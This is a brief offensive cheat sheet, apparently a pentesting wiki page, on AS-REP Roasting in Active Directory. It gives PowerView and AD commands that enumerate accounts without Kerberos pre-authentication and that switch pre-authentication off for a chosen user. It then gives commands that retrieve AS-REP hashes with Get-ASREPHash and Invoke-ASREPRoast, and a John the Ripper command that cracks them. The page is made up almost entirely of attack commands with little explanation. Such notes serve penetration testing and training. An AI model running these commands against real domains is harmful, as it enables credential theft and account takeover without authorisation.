AS-REP Roasting
Enumerate
Enumerating accounts with Kerberos pre-authentication disabled
Get-DomainUser -PreauthNotRequired -VerboseGet-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuthDisable pre-authentication
Set-DomainObject -Identity <User> -XOR @{useraccountcontrol=4194304} -VerboseRetrieve the hash
Get-ASREPHash -UserName VPN1user -Verbose
Invoke-ASREPRoast -VerboseCrack
john.exe --wordlist=passwords.txt asrephashes.txtLast updated
Was this helpful?